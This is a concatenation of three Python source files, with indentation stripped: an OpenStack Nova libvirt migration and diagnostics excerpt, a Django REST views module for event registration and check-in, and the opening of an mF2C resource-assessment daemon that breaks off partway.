"""Post operation of live migration at destination host.
:param context: security context
:param instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:param network_info: instance network information
:param block_migration: if true, post operation of block_migraiton.
"""
# Define migrated instance, otherwise, suspend/destroy does not work.
dom_list = self._conn.listDefinedDomains()
if instance["name"] not in dom_list:
# In case of block migration, destination does not have
# libvirt.xml
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance)
self.to_xml(instance, network_info, disk_info,
block_device_info, write_to_disk=True)
# libvirt.xml should be made by to_xml(), but libvirt
# does not accept to_xml() result, since uuid is not
# included in to_xml() result.
dom = self._lookup_by_name(instance["name"])
self._conn.defineXML(dom.XMLDesc(0))
def get_instance_disk_info(self, instance_name, xml=None,
block_device_info=None):
"""Preparation block migration.
:params instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:return:
json strings with below format::
"[{'path':'disk', 'type':'raw',
'virt_disk_size':'10737418240',
'backing_file':'backing_file',
'disk_size':'83886080'},...]"
"""
# NOTE (rmk): Passing the domain XML into this function is optional.
# When it is not passed, we attempt to extract it from
# the pre-existing definition.
if xml is None:
try:
virt_dom = self._lookup_by_name(instance_name)
xml = virt_dom.XMLDesc(0)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
msg = (_('Error from libvirt while getting description of '
'%(instance_name)s: [Error Code %(error_code)s] '
'%(ex)s') %
{'instance_name': instance_name,
'error_code': error_code,
'ex': ex})
LOG.warn(msg)
raise exception.InstanceNotFound(instance_id=instance_name)
# NOTE (rmk): When block_device_info is provided, we will use it to
# filter out devices which are actually volumes.
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
volume_devices = set()
for vol in block_device_mapping:
disk_dev = vol['mount_device'].rpartition("/")[2]
volume_devices.add(disk_dev)
disk_info = []
doc = etree.fromstring(xml)
disk_nodes = doc.findall('.//devices/disk')
path_nodes = doc.findall('.//devices/disk/source')
driver_nodes = doc.findall('.//devices/disk/driver')
target_nodes = doc.findall('.//devices/disk/target')
for cnt, path_node in enumerate(path_nodes):
disk_type = disk_nodes[cnt].get('type')
path = path_node.get('file')
target = target_nodes[cnt].attrib['dev']
if disk_type != 'file':
LOG.debug(_('skipping %s since it looks like volume'), path)
continue
if not path:
LOG.debug(_('skipping disk for %s as it does not have a path'),
instance_name)
continue
if target in volume_devices:
LOG.debug(_('skipping disk %(path)s (%(target)s) as it is a '
'volume'), {'path': path, 'target': target})
continue
# get the real disk size or
# raise a localized error if image is unavailable
dk_size = int(os.path.getsize(path))
disk_type = driver_nodes[cnt].get('type')
if disk_type == "qcow2":
backing_file = libvirt_utils.get_disk_backing_file(path)
virt_size = disk.get_disk_size(path)
over_commit_size = int(virt_size) - dk_size
else:
backing_file = ""
virt_size = 0
over_commit_size = 0
disk_info.append({'type': disk_type,
'path': path,
'virt_disk_size': virt_size,
'backing_file': backing_file,
'disk_size': dk_size,
'over_committed_disk_size': over_commit_size})
return jsonutils.dumps(disk_info)
def get_disk_over_committed_size_total(self):
"""Return total over committed disk size for all instances."""
# Disk size that all instance uses : virtual_size - disk_size
instances_name = self.list_instances()
disk_over_committed_size = 0
for i_name in instances_name:
try:
disk_infos = jsonutils.loads(
self.get_instance_disk_info(i_name))
for info in disk_infos:
disk_over_committed_size += int(
info['over_committed_disk_size'])
except OSError as e:
if e.errno == errno.ENOENT:
LOG.error(_('Getting disk size of %(i_name)s: %(e)s'),
{'i_name': i_name, 'e': e})
else:
raise
except exception.InstanceNotFound:
# Instance was deleted during the check so ignore it
pass
# NOTE(gtt116): give change to do other task.
greenthread.sleep(0)
return disk_over_committed_size
def unfilter_instance(self, instance, network_info):
"""See comments of same method in firewall_driver."""
self.firewall_driver.unfilter_instance(instance,
network_info=network_info)
def get_host_stats(self, refresh=False):
"""Return the current state of the host.
If 'refresh' is True, run update the stats first.
"""
return self.host_state.get_host_stats(refresh=refresh)
def get_host_uptime(self, host):
"""Returns the result of calling "uptime"."""
#NOTE(dprince): host seems to be ignored for this call and in
# other compute drivers as well. Perhaps we should remove it?
out, err = utils.execute('env', 'LANG=C', 'uptime')
return out
def manage_image_cache(self, context, all_instances):
"""Manage the local cache of images."""
self.image_cache_manager.verify_base_images(context, all_instances)
def _cleanup_remote_migration(self, dest, inst_base, inst_base_resize,
shared_storage=False):
"""Used only for cleanup in case migrate_disk_and_power_off fails."""
try:
if os.path.exists(inst_base_resize):
utils.execute('rm', '-rf', inst_base)
utils.execute('mv', inst_base_resize, inst_base)
if not shared_storage:
utils.execute('ssh', dest, 'rm', '-rf', inst_base)
except Exception:
pass
def _is_storage_shared_with(self, dest, inst_base):
# NOTE (rmk): There are two methods of determining whether we are
# on the same filesystem: the source and dest IP are the
# same, or we create a file on the dest system via SSH
# and check whether the source system can also see it.
shared_storage = (dest == self.get_host_ip_addr())
if not shared_storage:
tmp_file = uuid.uuid4().hex + '.tmp'
tmp_path = os.path.join(inst_base, tmp_file)
try:
utils.execute('ssh', dest, 'touch', tmp_path)
if os.path.exists(tmp_path):
shared_storage = True
os.unlink(tmp_path)
else:
utils.execute('ssh', dest, 'rm', tmp_path)
except Exception:
pass
return shared_storage
def migrate_disk_and_power_off(self, context, instance, dest,
instance_type, network_info,
block_device_info=None):
LOG.debug(_("Starting migrate_disk_and_power_off"),
instance=instance)
disk_info_text = self.get_instance_disk_info(instance['name'],
block_device_info=block_device_info)
disk_info = jsonutils.loads(disk_info_text)
# copy disks to destination
# rename instance dir to +_resize at first for using
# shared storage for instance dir (eg. NFS).
inst_base = libvirt_utils.get_instance_path(instance)
inst_base_resize = inst_base + "_resize"
shared_storage = self._is_storage_shared_with(dest, inst_base)
# try to create the directory on the remote compute node
# if this fails we pass the exception up the stack so we can catch
# failures here earlier
if not shared_storage:
utils.execute('ssh', dest, 'mkdir', '-p', inst_base)
self.power_off(instance)
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
try:
utils.execute('mv', inst_base, inst_base_resize)
# if we are migrating the instance with shared storage then
# create the directory. If it is a remote node the directory
# has already been created
if shared_storage:
dest = None
utils.execute('mkdir', '-p', inst_base)
for info in disk_info:
# assume inst_base == dirname(info['path'])
img_path = info['path']
fname = os.path.basename(img_path)
from_path = os.path.join(inst_base_resize, fname)
if info['type'] == 'qcow2' and info['backing_file']:
tmp_path = from_path + "_rbase"
# merge backing file
utils.execute('qemu-img', 'convert', '-f', 'qcow2',
'-O', 'qcow2', from_path, tmp_path)
if shared_storage:
utils.execute('mv', tmp_path, img_path)
else:
libvirt_utils.copy_image(tmp_path, img_path, host=dest)
utils.execute('rm', '-f', tmp_path)
else: # raw or qcow2 with no backing file
libvirt_utils.copy_image(from_path, img_path, host=dest)
except Exception:
with excutils.save_and_reraise_exception():
self._cleanup_remote_migration(dest, inst_base,
inst_base_resize,
shared_storage)
return disk_info_text
def _wait_for_running(self, instance):
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_("Instance running successfully."), instance=instance)
raise loopingcall.LoopingCallDone()
def finish_migration(self, context, migration, instance, disk_info,
network_info, image_meta, resize_instance,
block_device_info=None, power_on=True):
LOG.debug(_("Starting finish_migration"), instance=instance)
# resize disks. only "disk" and "disk.local" are necessary.
disk_info = jsonutils.loads(disk_info)
for info in disk_info:
fname = os.path.basename(info['path'])
if fname == 'disk':
size = instance['root_gb']
elif fname == 'disk.local':
size = instance['ephemeral_gb']
else:
size = 0
size *= 1024 * 1024 * 1024
# If we have a non partitioned image that we can extend
# then ensure we're in 'raw' format so we can extend file system.
fmt = info['type']
if (size and fmt == 'qcow2' and
disk.can_resize_fs(info['path'], size, use_cow=True)):
path_raw = info['path'] + '_raw'
utils.execute('qemu-img', 'convert', '-f', 'qcow2',
'-O', 'raw', info['path'], path_raw)
utils.execute('mv', path_raw, info['path'])
fmt = 'raw'
if size:
disk.extend(info['path'], size)
if fmt == 'raw' and CONF.use_cow_images:
# back to qcow2 (no backing_file though) so that snapshot
# will be available
path_qcow = info['path'] + '_qcow'
utils.execute('qemu-img', 'convert', '-f', 'raw',
'-O', 'qcow2', info['path'], path_qcow)
utils.execute('mv', path_qcow, info['path'])
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info,
image_meta)
# assume _create_image do nothing if a target file exists.
# TODO(oda): injecting files is not necessary
self._create_image(context, instance,
disk_mapping=disk_info['mapping'],
network_info=network_info,
block_device_info=None)
xml = self.to_xml(instance, network_info, disk_info,
block_device_info=block_device_info,
write_to_disk=True)
self._create_domain_and_network(xml, instance, network_info,
block_device_info, power_on)
if power_on:
timer = loopingcall.FixedIntervalLoopingCall(
self._wait_for_running,
instance)
timer.start(interval=0.5).wait()
def _cleanup_failed_migration(self, inst_base):
"""Make sure that a failed migrate doesn't prevent us from rolling
back in a revert.
"""
shutil.rmtree(inst_base)
def finish_revert_migration(self, instance, network_info,
block_device_info=None, power_on=True):
LOG.debug(_("Starting finish_revert_migration"),
instance=instance)
inst_base = libvirt_utils.get_instance_path(instance)
inst_base_resize = inst_base + "_resize"
# NOTE(danms): if we're recovering from a failed migration,
# make sure we don't have a left-over same-host base directory
# that would conflict. Also, don't fail on the rename if the
# failure happened early.
if os.path.exists(inst_base_resize):
if os.path.exists(inst_base):
self._cleanup_failed_migration(inst_base)
utils.execute('mv', inst_base_resize, inst_base)
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info)
xml = self.to_xml(instance, network_info, disk_info,
block_device_info=block_device_info)
self._create_domain_and_network(xml, instance, network_info,
block_device_info, power_on)
if power_on:
timer = loopingcall.FixedIntervalLoopingCall(
self._wait_for_running,
instance)
timer.start(interval=0.5).wait()
def confirm_migration(self, migration, instance, network_info):
"""Confirms a resize, destroying the source VM."""
self._cleanup_resize(instance, network_info)
def get_diagnostics(self, instance):
def get_io_devices(xml_doc):
"""get the list of io devices from the xml document."""
result = {"volumes": [], "ifaces": []}
try:
doc = etree.fromstring(xml_doc)
except Exception:
return result
blocks = [('./devices/disk', 'volumes'),
('./devices/interface', 'ifaces')]
for block, key in blocks:
section = doc.findall(block)
for node in section:
for child in node.getchildren():
if child.tag == 'target' and child.get('dev'):
result[key].append(child.get('dev'))
return result
domain = self._lookup_by_name(instance['name'])
output = {}
# get cpu time, might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
try:
cputime = domain.vcpus()[0]
for i in range(len(cputime)):
output["cpu" + str(i) + "_time"] = cputime[i][2]
except libvirt.libvirtError:
pass
# get io status
xml = domain.XMLDesc(0)
dom_io = get_io_devices(xml)
for disk in dom_io["volumes"]:
try:
# blockStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
stats = domain.blockStats(disk)
output[disk + "_read_req"] = stats[0]
output[disk + "_read"] = stats[1]
output[disk + "_write_req"] = stats[2]
output[disk + "_write"] = stats[3]
output[disk + "_errors"] = stats[4]
except libvirt.libvirtError:
pass
for interface in dom_io["ifaces"]:
try:
# interfaceStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
stats = domain.interfaceStats(interface)
output[interface + "_rx"] = stats[0]
output[interface + "_rx_packets"] = stats[1]
output[interface + "_rx_errors"] = stats[2]
output[interface + "_rx_drop"] = stats[3]
output[interface + "_tx"] = stats[4]
output[interface + "_tx_packets"] = stats[5]
output[interface + "_tx_errors"] = stats[6]
output[interface + "_tx_drop"] = stats[7]
except libvirt.libvirtError:
pass
output["memory"] = domain.maxMemory()
# memoryStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
try:
mem = domain.memoryStats()
for key in mem.keys():
output["memory-" + key] = mem[key]
except (libvirt.libvirtError, AttributeError):
pass
return output
def add_to_aggregate(self, context, aggregate, host, **kwargs):
"""Add a compute host to an aggregate."""
#NOTE(jogo) Currently only used for XenAPI-Pool
pass
def remove_from_aggregate(self, context, aggregate, host, **kwargs):
"""Remove a compute host from an aggregate."""
pass
def undo_aggregate_operation(self, context, op, aggregate,
host, set_error=True):
"""only used for Resource Pools."""
pass
def instance_on_disk(self, instance):
# ensure directories exist and are writable
instance_path = libvirt_utils.get_instance_path(instance)
LOG.debug(_('Checking instance files accessability %s'), instance_path)
return os.access(instance_path, os.W_OK)
def inject_network_info(self, instance, nw_info):
self.firewall_driver.setup_basic_filtering(instance, nw_info)
class HostState(object):
"""Manages information about the compute node through libvirt."""
def __init__(self, driver):
super(HostState, self).__init__()
self._stats = {}
self.driver = driver
self.update_status()
def get_host_stats(self, refresh=False):
"""Return the current state of the host.
If 'refresh' is True, run update the stats first.
"""
if refresh:
self.update_status()
return self._stats
def update_status(self):
"""Retrieve status info from libvirt."""
LOG.debug(_("Updating host stats"))
data = {}
data["vcpus"] = self.driver.get_vcpu_total()
data["vcpus_used"] = self.driver.get_vcpu_used()
data["cpu_info"] = jsonutils.loads(self.driver.get_cpu_info())
disk_info_dict = self.driver.get_local_gb_info()
data["disk_total"] = disk_info_dict['total']
data["disk_used"] = disk_info_dict['used']
data["disk_available"] = disk_info_dict['free']
data["host_memory_total"] = self.driver.get_memory_mb_total()
data["host_memory_free"] = (data["host_memory_total"] -
self.driver.get_memory_mb_used())
data["hypervisor_type"] = self.driver.get_hypervisor_type()
data["hypervisor_version"] = self.driver.get_hypervisor_version()
data["hypervisor_hostname"] = self.driver.get_hypervisor_hostname()
data["supported_instances"] = \
self.driver.get_instance_capabilities()
self._stats = data
return data
|
views.py
|
from threading import Thread
from channels.layers import get_channel_layer
from asgiref.sync import async_to_sync
from django.contrib.auth.models import User
from django.contrib.auth import get_user_model
from django.utils import timezone
from django.http import Http404, HttpResponse, FileResponse
from urllib.parse import quote
from rest_framework import generics, status
from rest_framework import permissions
from rest_framework.response import Response
from rest_framework.views import APIView
from rest_framework.decorators import api_view, permission_classes
from rest_framework.serializers import ValidationError
from backend.serializers import *
from backend.permissions import *
from backend.utils.qrcode import text_to_qr
from backend.utils.email import send_activation_email, send_registered_email
from backend.utils.excel import *
def check_is_admin(user, event):
if not isinstance(user, get_user_model()):
return False
if user.is_site_admin:
return True
return UserManageEvent.objects.filter(user=user, event=event).exists()
def check_is_admin_not_site_admin(user, event):
return UserManageEvent.objects.filter(user=user, event=event).exists()
def check_event_registered(user, event):
return UserRegisterEvent.objects.filter(user=user, event=event).exists()
def check_event_register_approved(user, event):
return UserRegisterEvent.objects.filter(user=user, event=event, approved=True).exists()
@api_view(['GET', 'POST'])
def activate_user(request):
if 'token' not in request.data:
raise ValidationError('No token provided.')
try:
user = get_user_model().objects.get(activate_token=request.data.get('token'))
except get_user_model().DoesNotExist:
raise ValidationError('Invalid token.')
if user.is_activated:
raise ValidationError('Already activated.')
if user.activate_token is not None:
user.activate()
return Response(status=status.HTTP_200_OK)
@api_view(['GET'])
@permission_classes((permissions.IsAuthenticated, IsSiteAdminOrSelf))
def send_activation(request):
user = request.user
data = request.GET
if 'user_id' in data:
try:
user = get_user_model().objects.get(id=data.get('user_id'))
except get_user_model().DoesNotExist:
raise ValidationError('User Not Found.')
if user is None or isinstance(user, AnonymousUser):
raise ValidationError('No User Specified.')
if user.is_activated:
raise ValidationError('Already activated.')
user.generate_activate_token()
send_activation_email(user)
return Response(status=status.HTTP_200_OK)
@api_view(['GET', 'POST'])
def gen_qrcode(request):
if 'text' not in request.data:
raise ValidationError('No text provided.')
text = request.data.get('text')
qr_img = text_to_qr(text)
return HttpResponse(qr_img, content_type='image/png')
class DummyView(APIView):
permission_classes = (permissions.IsAuthenticated,)
def get(self, request, format=None):
content = {
'status': 'request was permitted',
'is_activated': request.user.is_activated
}
return Response(content)
class UserProfileView(APIView):
permission_classes = (permissions.IsAuthenticated,)
def get(self, request, format=None):
serializer = UserProfileSerializer(instance=request.user)
return Response(serializer.data)
class UserView(generics.RetrieveUpdateDestroyAPIView):
queryset = get_user_model().objects.all()
serializer_class = UserProfileSerializer
permission_classes = (permissions.IsAuthenticated, IsSiteAdminOrSelf)
class EventList(generics.ListCreateAPIView):
queryset = Event.objects.filter(public=True)
serializer_class = EventListSerializer
permission_classes = (permissions.IsAuthenticatedOrReadOnly, IsActivatedOrReadOnly)
def perform_create(self, serializer):
# user = get_user_model().objects.get(id=self.request.data.get('host_id', ''))
user = self.request.user
desc = ''
if 'description' in self.request.data:
desc = self.request.data.get('description')
event_obj = serializer.save(host=user, description=desc)
ume_obj = UserManageEvent(user=user, event=event_obj)
ume_obj.save()
class PastEventList(generics.ListAPIView):
queryset = Event.objects.filter(public=True, end_time__lte=timezone.now())
serializer_class = EventListSerializer
class FutureEventList(generics.ListAPIView):
queryset = Event.objects.filter(public=True, start_time__gt=timezone.now())
serializer_class = EventListSerializer
class OngoingEventList(generics.ListAPIView):
queryset = Event.objects.filter(public=True, start_time__lte=timezone.now(), end_time__gt=timezone.now())
serializer_class = EventListSerializer
class UserRegisterEventList(generics.ListAPIView):
serializer_class = UserRegisterEventSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrSelf)
def get_queryset(self):
# user = get_user_model().objects.get(id=self.kwargs.get('pk'))
user = self.request.user
return UserRegisterEvent.objects.filter(user=user)
class UserManageEventList(generics.ListAPIView):
serializer_class = UserManageEventSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrSelf)
def get_queryset(self):
# user = get_user_model().objects.get(id=self.kwargs.get('pk'))
user = self.request.user
return UserManageEvent.objects.filter(user=user)
class UserRegisterFutureEventList(generics.ListAPIView):
serializer_class = UserRegisterEventSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrSelf)
def get_queryset(self):
# user = get_user_model().objects.get(id=self.kwargs.get('pk'))
user = self.request.user
return UserRegisterEvent.objects.filter(user=user, event__start_time__gt=timezone.now())
class UserRegisterPastEventList(generics.ListAPIView):
serializer_class = UserRegisterEventSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrSelf)
def get_queryset(self):
# user = get_user_model().objects.get(id=self.kwargs.get('pk'))
user = self.request.user
return UserRegisterEvent.objects.filter(user=user, event__end_time__lte=timezone.now())
class UserRegisterOngoingEventList(generics.ListAPIView):
serializer_class = UserRegisterEventSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrSelf)
def get_queryset(self):
# user = get_user_model().objects.get(id=self.kwargs.get('pk'))
user = self.request.user
return UserRegisterEvent.objects.filter(user=user, event__start_time__lte=timezone.now(),
event__end_time__gt=timezone.now())
class UserEventRegister(generics.CreateAPIView):
serializer_class = UserRegisterEventSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated)
def perform_create(self, serializer):
user = self.request.user
data = self.request.data
if 'user_id' in data:
try:
user = get_user_model().objects.get(id=data.get('user_id'))
except Event.DoesNotExist:
raise ValidationError('User Not Found.')
if 'event_id' not in data:
raise ValidationError('No event_id specified.')
try:
event = Event.objects.get(id=data.get('event_id'))
except Event.DoesNotExist:
raise ValidationError('Event Not found.')
if check_event_registered(user, event):
if check_event_register_approved(user, event):
raise ValidationError('Already Registered.')
else:
raise ValidationError('Already applied, waiting for approval.')
if event.require_approve:
if event.require_application:
if 'application_text' not in data or data.get('application_text') == '':
raise ValidationError('Need to provide application info.')
serializer.save(user=user, event=event, transport=None, approved=False)
event.newregistration()
send_registered_email(user, event, approved=False)
else:
transport = None
if 'transport_id' in data:
try:
transport = Transport.objects.get(id=data.get('transport_id'))
except Event.DoesNotExist:
raise ValidationError('Transport Not found.')
serializer.save(user=user, event=event, transport=transport, approved=True)
event.newregistration()
send_registered_email(user, event, approved=True)
class UserEventConflict(APIView):
queryset = UserRegisterEvent.objects.all()
serializer_class = UserRegisterEventSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrSelf|IsSiteAdminOrEventManager)
def post(self, request, format=None):
data = request.data
user = request.user
if 'user_id' in data:
try:
user = get_user_model().objects.get(id=data.get('user_id'))
except get_user_model().DoesNotExist:
raise ValidationError('User Not Found.')
event = Event.objects.get(id=data.get('event_id'))
if check_event_registered(user, event):
if check_event_register_approved(user, event):
raise ValidationError('Already Registered this event.')
else:
raise ValidationError('Already applied this event, waiting for approval.')
ret_data = {}
lst = UserRegisterEvent.objects.filter(user=user,
event__start_time__lte=event.end_time,
event__end_time__gte=event.start_time)
if lst.exists():
ret_data['conflict'] = True
if 'user_id' not in data:
ret_data['user_register_event'] = UserRegisterEventSerializer(lst[0]).data
return Response(ret_data)
ret_data['conflict'] = False
return Response(ret_data)
class ApproveEventRegister(APIView):
queryset = UserRegisterEvent.objects.all()
serializer_class = UserRegisterEventSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrEventManager)
def post(self, request, format=None):
data = request.data
if 'approve' not in data:
raise ValidationError('Need to provide "approve" (Boolean) field.')
approve = data['approve']
if 'user_id' not in data:
raise ValidationError('No user specified.')
try:
user = get_user_model().objects.get(id=data.get('user_id'))
except get_user_model().DoesNotExist:
raise ValidationError('User Not Found.')
event = Event.objects.get(id=data.get('event_id'))
try:
ure_obj = UserRegisterEvent.objects.get(user=user, event=event)
except UserRegisterEvent.DoesNotExist:
raise ValidationError('Not registered/applied.')
if approve:
if ure_obj.approved:
raise ValidationError('Already Approved.')
ure_obj.approve()
event.newapproved()
if not approve:
event.newunregistration(approve)
ure_obj.reject()
ure_obj.delete()
return Response(status=status.HTTP_200_OK)
class UserEventUnregister(APIView):
queryset = UserRegisterEvent.objects.all()
serializer_class = UserRegisterEventSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrSelf|IsSiteAdminOrEventManager)
def post(self, request, format=None):
user = request.user
data = request.data
if 'user_id' in data:
user = get_user_model().objects.get(id=data.get('user_id'))
event = Event.objects.get(id=data.get('event_id'))
if not check_event_registered(user, event):
raise ValidationError('Not registered.')
ure_obj = UserRegisterEvent.objects.get(user=user, event=event)
if ure_obj.checked_in:
raise ValidationError('Already checked in.')
if ure_obj.transport is not None:
ure_obj.transport.delete()
event.newunregistration(ure_obj.approved)
ure_obj.delete()
return Response(status=status.HTTP_200_OK)
class AssignEventAdmin(generics.CreateAPIView):
# Not Tested
serializer_class = UserManageEventSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrEventManager)
def perform_create(self, serializer):
user = self.request.user
data = self.request.data
if 'user_id' in data:
try:
user = get_user_model().objects.get(id=data.get('user_id'))
except Event.DoesNotExist:
raise ValidationError('User Not Found.')
event = Event.objects.get(id=data.get('event_id'))
if check_is_admin_not_site_admin(user, event):
raise ValidationError('Is admin already.')
serializer.save(user=user, event=event)
class EventDetail(generics.RetrieveUpdateDestroyAPIView):
queryset = Event.objects.all()
serializer_class = EventDetailSerializer
permission_classes = (IsEventHostAdminOrReadOnly|IsAdminUser,)
pk_type = 'event'
def get(self, request, *args, **kwargs):
try:
obj = Event.objects.get(pk=kwargs.get('pk'))
except Event.DoesNotExist:
raise Http404
data = self.retrieve(request, *args, **kwargs).data
data['event_admin'] = check_is_admin(request.user, obj)
try:
ure_obj = UserRegisterEvent.objects.get(user=request.user, event=obj)
data['event_registered'] = True
data['user_register_event'] = UserRegisterEventSerializer(ure_obj).data
except UserRegisterEvent.DoesNotExist:
data['event_registered'] = False
return Response(data)
class EventAttendeeList(generics.ListAPIView):
serializer_class = UserRegisterEventSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated)
pk_type = 'event'
def get_queryset(self):
try:
event = Event.objects.get(pk=self.kwargs.get('pk'))
except Event.DoesNotExist:
return None
if not check_is_admin(self.request.user, event):
raise ValidationError('Not Authorized.')
return UserRegisterEvent.objects.filter(event=event)
class EventAdminList(generics.ListAPIView):
serializer_class = UserManageEventSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated)
pk_type = 'event'
def get_queryset(self):
try:
event = Event.objects.get(pk=self.kwargs.get('pk'))
except Event.DoesNotExist:
return None
if not check_is_admin(self.request.user, event):
raise ValidationError('Not Authorized.')
return UserManageEvent.objects.filter(event=event)
class TransportCreateView(generics.CreateAPIView):
queryset = Transport.objects.all()
serializer_class = TransportSerializer
permission_classes = (permissions.IsAuthenticated, IsSiteAdminOrSelf|IsSiteAdminOrEventManager)
def perform_create(self, serializer):
user = self.request.user
data = self.request.data
if 'user_id' in data:
user = get_user_model().objects.get(id=data['user_id'])
event = Event.objects.get(id=data.get('event_id'))
try:
tp_obj = Transport.objects.get(user=user, event=event)
tp_obj.delete()
except Transport.DoesNotExist:
pass
finally:
tp_obj = serializer.save(user=user, event=event)
try:
ure_obj = UserRegisterEvent.objects.get(user=user, event=event)
ure_obj.transport = tp_obj
ure_obj.save()
except UserRegisterEvent.DoesNotExist:
pass
class TransportView(generics.RetrieveUpdateDestroyAPIView):
queryset = Transport.objects.all()
serializer_class = TransportSerializer
permission_classes = (permissions.IsAuthenticated, IsOwner|IsEventHostAdmin|IsAdminUser)
pk_type = 'transport'
class EventCheckInList(generics.ListCreateAPIView):
queryset = CheckIn.objects.all()
serializer_class = CheckInSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrEventManager)
pk_type = 'event'
def get_queryset(self):
queryset = super(EventCheckInList, self).get_queryset()
return queryset.filter(event__pk=self.kwargs.get('pk'))
def perform_create(self, serializer):
serializer.save(event_id=self.kwargs.get('pk'))
class UserCheckInEvent(APIView):
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrSelf|IsSiteAdminOrEventManager)
pk_type = 'checkin'
def post(self, request, pk, format=None):
try:
checkinobj = CheckIn.objects.get(pk=pk)
except CheckIn.DoesNotExist:
raise Http404
if not checkinobj.started:
raise ValidationError('Check-in not enabled.')
user = request.user
if 'user_id' in request.data:
try:
user = get_user_model().objects.get(id=request.data.get('user_id'))
except get_user_model().DoesNotExist:
raise ValidationError('User not found.')
try:
ure_obj = UserRegisterEvent.objects.get(user=user, event=checkinobj.event)
except UserRegisterEvent.DoesNotExist:
raise ValidationError('Not registered.')
if not ure_obj.approved:
raise ValidationError('Registration not approved.')
self.check_object_permissions(request, ure_obj)
if ure_obj.checked_in and UserCheckIn.objects.filter(ure=ure_obj, checkin=checkinobj).exists():
raise ValidationError('Already checked in.')
uc_obj = UserCheckIn(ure=ure_obj, checkin=checkinobj)
uc_obj.save()
checkinobj.newcheckin()
if not ure_obj.checked_in:
ure_obj.checkin()
ure_obj.save()
return Response(status=status.HTTP_202_ACCEPTED)
class ToggleCheckIn(APIView):
serializer_class = CheckInSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrEventManager)
pk_type = 'checkin'
def post(self, request, pk, format=None):
try:
obj = CheckIn.objects.get(pk=pk)
except CheckIn.DoesNotExist:
raise Http404
obj.toggle()
obj.save()
return Response(CheckInSerializer(obj).data, status=status.HTTP_202_ACCEPTED)
class DeleteCheckIn(generics.DestroyAPIView):
queryset = CheckIn.objects.all()
serializer_class = CheckInSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrEventManager)
pk_type = 'checkin'
class ExportExcel(APIView):
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrEventManager)
pk_type = 'event'
def get(self, request, pk, format=None):
try:
event = Event.objects.get(pk=pk)
file_path, file_name = export_excel(event)
response = FileResponse(open(file_path, 'rb'))
response['content_type'] = 'application/octet-stream'
response['Content-Disposition'] = 'attachment; filename=' + quote(file_name)
return response
except Exception:
raise
class ImportExcel(APIView):
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrEventManager)
pk_type = 'event'
def post(self, request, pk, format=None):
try:
event = Event.objects.get(pk=pk)
except Event.DoesNotExist:
raise Http404
try:
file = request.FILES['file']
except Exception:
raise ValidationError('No file uploaded.')
if file.name.split('.')[-1] != 'xlsx':
raise ValidationError('Not a .xlsx file.')
channel_layer = get_channel_layer()
send = async_to_sync(channel_layer.group_send)
group_name = 'event_%s_import' % event.id
def callback(data):
send(group_name, {
'type': 'import_message',
'message': data
})
t = Thread(target=import_excel, args=(event, file, callback))
t.start()
return Response(status=status.HTTP_202_ACCEPTED)
class DownloadExcelTemplate(APIView):
permission_classes = (permissions.IsAuthenticated, IsActivated)
pk_type = 'event'
def get(self, request, format=None):
file_path = get_import_template()
response = FileResponse(open(file_path, 'rb'))
response['content_type'] = 'application/octet-stream'
response['Content-Disposition'] = 'attachment; filename=' + quote(os.path.basename(IMPORT_TEMPLATE_FILE_PATH))
return response
|
assessment_process.py
|
"""
User Management Assesment process / daemon
This is being developed for the MF2C Project: http://www.mf2c-project.eu/
Copyright: Roi Sucasas Font, Atos Research and Innovation, 2017.
This code is licensed under an Apache 2.0 license. Please, refer to the LICENSE.TXT file for more information
Created on 27 sept. 2017
@author: Roi Sucasas - ATOS
"""
import time, threading
from usermgnt.data import data_adapter as data_adapter
from usermgnt.data.atos import lifecycle as mf2c
from usermgnt.common.logs import LOG
from usermgnt.common.common import TRACE
execute = False
d = None
# check_resources_used: checks if the resources used by mF2C apps, match the user's profiling and sharing model properties
def __check_resources_used(user_profile, sharing_model, battery_level, total_services):
try:
LOG.log(TRACE, "[usermgnt.modules.assessment] [__check_resources_used] << Assessment Process >> [battery_level=" + str(battery_level) + "], "
"[total_services=" + str(total_services) + "]")
result = {}
if battery_level <= sharing_model['battery_limit']:
result['battery_limit_violation'] = True
if not user_profile['resource_contributor'] and total_services > 0:
result['resource_contributor_violation'] = True
if total_services > sharing_model['max_apps']:
result['max_apps_violation'] = True
except:
LOG.exception('[usermgnt.modules.assessment] [__check_resources_used] << Assessment Process >> check_resources_used >> Exception')
return result # TODO check if empty
# daemon process
def __daemon():
global execute
try:
while execute:
